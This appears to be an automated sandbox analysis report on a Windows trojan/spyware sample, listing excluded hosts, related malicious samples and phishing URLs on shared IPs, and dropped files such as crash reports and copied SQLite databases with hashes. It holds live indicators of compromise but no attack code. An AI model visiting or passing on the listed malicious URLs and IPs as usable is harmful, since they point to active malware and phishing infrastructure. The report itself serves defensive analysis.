Classification:	mal96.troj.spyw.evad.winEXE@2/49@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172, 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
14:25:21	API Interceptor	86x Sleep call for process: file.exe modified
14:25:43	API Interceptor	1x Sleep call for process: WerFault.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
THEZONEBG	m68k.nn.elf	Get hash	malicious	Mirai	Browse	91.92.246.113
	arm7.nn.elf	Get hash	malicious	Mirai	Browse	91.92.246.113
	https://webmail_208425654.itdays.net/271702705cloudstore-428375907?data=consumer-in@kenvue.com	Get hash	malicious	HTMLPhisher	Browse	91.92.242.44
	SecuriteInfo.com.Script.SNH-gen.5224.29912.exe	Get hash	malicious	FormBook	Browse	91.92.254.145
	1.ps1	Get hash	malicious	Unknown	Browse	91.92.244.213
	85.239.34.249-bot.mipsel-2024-08-21T04_13_33.elf	Get hash	malicious	Mirai	Browse	91.92.250.26
	https://src-assistanceclient.com/robots.txt	Get hash	malicious	Unknown	Browse	91.92.251.55
	https://trackparcelonnlin.com/FPAPPP/	Get hash	malicious	Unknown	Browse	91.92.254.150
	SecuriteInfo.com.Win32.DropperX-gen.5166.30540.exe	Get hash	malicious	Remcos	Browse	91.92.254.178
	Ravakhu24105.exe	Get hash	malicious	Remcos	Browse	91.92.254.178

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_39b13177aa1788ae077cf99bc1cf916ddac40c4_10004810_9d730b21-5673-4d8c-844b-db0d3fb1ff6a\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3678284195612758
Encrypted:	false
SSDEEP:	192:6ByEE2F5LvIPlb0GCW9I3jfI2Lbl4CZd/ZF1zuiFHZ24lO8TVB:wV/INoGCWGjdL54qTzuiFHY4lO8X
MD5:	F81F73A7FA65FF2DFAE0B3980DE289D8
SHA1:	9E868C188F65EC61349C175049EC889436D961FF
SHA-256:	EE0761C474AD40826BC6E62BF23AD8037FACACBCB1137DAE54AF23AAEFCD0C41
SHA-512:	4BEF883C4FDB55FA14BD313B7541C0AB09B328EBC5DA1B139D32D784D3F1391382B9C9E2012F4DA9D5390C772D4BBF6812A0F2B3BF3B6DD9618B8D0A6BB71293
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.0.3.4.3.3.2.7.6.0.7.9.3.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.0.3.4.3.3.3.4.1.7.0.4.9.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.d.7.3.0.b.2.1.-.5.6.7.3.-.4.d.8.c.-.8.4.4.b.-.d.b.0.d.3.f.b.1.f.f.6.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.0.b.4.b.2.0.a.-.b.7.4.1.-.4.a.f.5.-.a.a.0.5.-.7.8.7.8.5.f.7.0.c.c.1.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.9.0.-.0.0.0.1.-.0.0.1.4.-.5.2.d.7.-.4.a.f.2.c.0.f.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.a.3.1.1.a.a.3.a.9.2.4.3.8.4.9.b.8.8.3.8.6.7.f.a.3.d.7.7.2.e.4.c.4.e.9.5.d.0.8.0.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.0.5.:.1.4.:.5.1.:.1.8.!.2.1.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6FD.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 17 streams, Thu Sep 5 18:25:33 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	646572
Entropy (8bit):	2.9827914390055117
Encrypted:	false
SSDEEP:	3072:mvMpGLNF3+vEkMhTLiZgy9aPaGRiSNsQ4lvQqBxcSoFWK0fj1CCqmRZm:rp+F3QECZgysniSNsQsv5hVq8U
MD5:	77A68FE4EF69C5FB7E0032E213E26DEF
SHA1:	DC67BB9864B78BBFBD962706BA826A26B98FCC31
SHA-256:	C7CC489770FF934CB183E0B3CB9FE699C11522694D812A2F9CC6AD0A709A155B
SHA-512:	5AF22AF845635214336FEC338E1F69AD5F60906E5B33B0AB55338A783ABC9F76742A0FF192029FB808AD62CB28A1913E41F63406DA8D13B1FF2C0E8F6BCC8DD8
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........f............4... ........%..`.......$...\0...........0.......<.............x.......8...........T...$.......pT..<............@...........B...........B..............................................................................eJ.......B......Lw......................T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...............................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB8B3.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	9036
Entropy (8bit):	3.705845066617612
Encrypted:	false
SSDEEP:	192:R6l7wVeJECFa6Y9IgnTAzgmfB1ypDG89b0p0fWJcm:R6lXJ5a6YGgnTsgmfDg06fWH
MD5:	2AF0DA68659C605E159E25FE84A59D87
SHA1:	EE4F13384541938CBA8244CEF87B7E4C2EE95184
SHA-256:	5D7898611E9302523D90679AACFAB7636878144CE29956CEAF506C1C8D751352
SHA-512:	5625A5F5B71BDD784EE6D9F2E6248CE34059255D441D764161523CA74F452767E2F0F59F69FFD94D70A58F0A63C4200BC2B5A82212687DB8F4050BB15A7DDB38
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.5.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB8F3.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4657
Entropy (8bit):	4.466015411122156
Encrypted:	false
SSDEEP:	48:cvIwWl8zsauJg771I9P/bQWpW8VYZ0Ym8M4JO8VOKF4cyq85vPhOtC6HkpuhGd:uIjf1I7Ud7V2JrdYf6HquhGd
MD5:	E0A7AF1CA01AE3B2C7661B4E76B95045
SHA1:	B1F97EC272F5865189F5489F53BDED0A68CCEAFF
SHA-256:	F599EE8CC402BB676011F6D218EFC176D1B3123844CFDE4FBD0E62F67348268A
SHA-512:	EA0DBE97BFD06158F6E86FA66185EC446E80363A8B11F31AB3C40F4C26FFB68C2D6D64E99380C3AA63B522D9C88FD4C1FE131365D09EE1EC1D2D2D05E6329FA2
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="487288" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Temp\tmp1AE8.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B08.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B19.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B29.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp30CD.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\Temp\tmp30FC.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\Temp\tmp5257.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5268.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5288.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5299.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp529A.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp52AB.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp60E4.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp60F4.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
